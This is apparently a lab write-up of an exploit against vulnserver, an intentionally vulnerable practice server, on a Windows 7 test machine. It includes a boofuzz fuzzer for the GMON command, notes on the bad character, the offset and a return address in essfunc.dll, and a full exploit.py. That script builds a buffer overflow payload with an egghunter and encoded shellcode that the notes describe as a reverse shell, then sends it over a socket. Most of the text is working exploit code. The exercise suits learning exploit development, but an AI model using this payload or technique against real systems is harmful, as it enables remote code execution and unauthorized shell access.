| reference |
stephenbradshaw/vulnserver |
| os name |
Microsoft Windows 7 Professional |
| os version |
6.1.7601 Service Pack 1 Build 7601 |
| system type |
x86-based PC |
| target ip |
192.168.1.6 |
fuzz
fuzz_gmon.py1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
|
from boofuzz import *
host = "192.168.1.6"
port = 9999
session = Session(
target=Target(
connection=SocketConnection(host, port)
), sleep_time=1)
s_initialize("gmon")
s_string("GMON", fuzzable=False)
s_delim(" ", fuzzable=False)
s_string("data")
session.connect(s_get("gmon"))
session.fuzz()
|
badchar
omitted
\x00
offset
omitted
3515
return address
omitted
essfunc.dll 0x625010b4
shellcode
more space
omitted
jmp short
egghunter
omitted
reverse shell shellcode
omitted
exploit.py
exploit.py1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
|
import socket
import os
import sys
host = "192.168.1.6"
port = 9999
egghunter = b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
shellcode = b"w00tw00t"
shellcode += b"\xbb\x06\x14\xd9\x61\xd9\xc8\xd9\x74\x24\xf4"
shellcode += b"\x5a\x29\xc9\xb1\x52\x83\xea\xfc\x31\x5a\x0e"
shellcode += b"\x03\x5c\x1a\x3b\x94\x9c\xca\x39\x57\x5c\x0b"
shellcode += b"\x5e\xd1\xb9\x3a\x5e\x85\xca\x6d\x6e\xcd\x9e"
shellcode += b"\x81\x05\x83\x0a\x11\x6b\x0c\x3d\x92\xc6\x6a"
shellcode += b"\x70\x23\x7a\x4e\x13\xa7\x81\x83\xf3\x96\x49"
shellcode += b"\xd6\xf2\xdf\xb4\x1b\xa6\x88\xb3\x8e\x56\xbc"
shellcode += b"\x8e\x12\xdd\x8e\x1f\x13\x02\x46\x21\x32\x95"
shellcode += b"\xdc\x78\x94\x14\x30\xf1\x9d\x0e\x55\x3c\x57"
shellcode += b"\xa5\xad\xca\x66\x6f\xfc\x33\xc4\x4e\x30\xc6"
shellcode += b"\x14\x97\xf7\x39\x63\xe1\x0b\xc7\x74\x36\x71"
shellcode += b"\x13\xf0\xac\xd1\xd0\xa2\x08\xe3\x35\x34\xdb"
shellcode += b"\xef\xf2\x32\x83\xf3\x05\x96\xb8\x08\x8d\x19"
shellcode += b"\x6e\x99\xd5\x3d\xaa\xc1\x8e\x5c\xeb\xaf\x61"
shellcode += b"\x60\xeb\x0f\xdd\xc4\x60\xbd\x0a\x75\x2b\xaa"
shellcode += b"\xff\xb4\xd3\x2a\x68\xce\xa0\x18\x37\x64\x2e"
shellcode += b"\x11\xb0\xa2\xa9\x56\xeb\x13\x25\xa9\x14\x64"
shellcode += b"\x6c\x6e\x40\x34\x06\x47\xe9\xdf\xd6\x68\x3c"
shellcode += b"\x4f\x86\xc6\xef\x30\x76\xa7\x5f\xd9\x9c\x28"
shellcode += b"\xbf\xf9\x9f\xe2\xa8\x90\x5a\x65\x17\xcc\x65"
shellcode += b"\x2c\xff\x0f\x65\xcf\x44\x86\x83\xa5\xaa\xcf"
shellcode += b"\x1c\x52\x52\x4a\xd6\xc3\x9b\x40\x93\xc4\x10"
shellcode += b"\x67\x64\x8a\xd0\x02\x76\x7b\x11\x59\x24\x2a"
shellcode += b"\x2e\x77\x40\xb0\xbd\x1c\x90\xbf\xdd\x8a\xc7"
shellcode += b"\xe8\x10\xc3\x8d\x04\x0a\x7d\xb3\xd4\xca\x46"
shellcode += b"\x77\x03\x2f\x48\x76\xc6\x0b\x6e\x68\x1e\x93"
shellcode += b"\x2a\xdc\xce\xc2\xe4\x8a\xa8\xbc\x46\x64\x63"
shellcode += b"\x12\x01\xe0\xf2\x58\x92\x76\xfb\xb4\x64\x96"
shellcode += b"\x4a\x61\x31\xa9\x63\xe5\xb5\xd2\x99\x95\x3a"
shellcode += b"\x09\x1a\xa5\x70\x13\x0b\x2e\xdd\xc6\x09\x33"
shellcode += b"\xde\x3d\x4d\x4a\x5d\xb7\x2e\xa9\x7d\xb2\x2b"
shellcode += b"\xf5\x39\x2f\x46\x66\xac\x4f\xf5\x87\xe5"
payload = b"GMON /.:/"
payload += b"\x90" * 16
payload += shellcode
payload += b"A" * (3515 - 16 - len(shellcode)) + b"\xeb\x06\x41\x41"
payload += b"\xb4\x10\x50\x62"
payload += egghunter
payload += b"C" * (5000 - len(payload))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
s.recv(1024)
s.send(payload)
s.recv(1024)
s.close()
|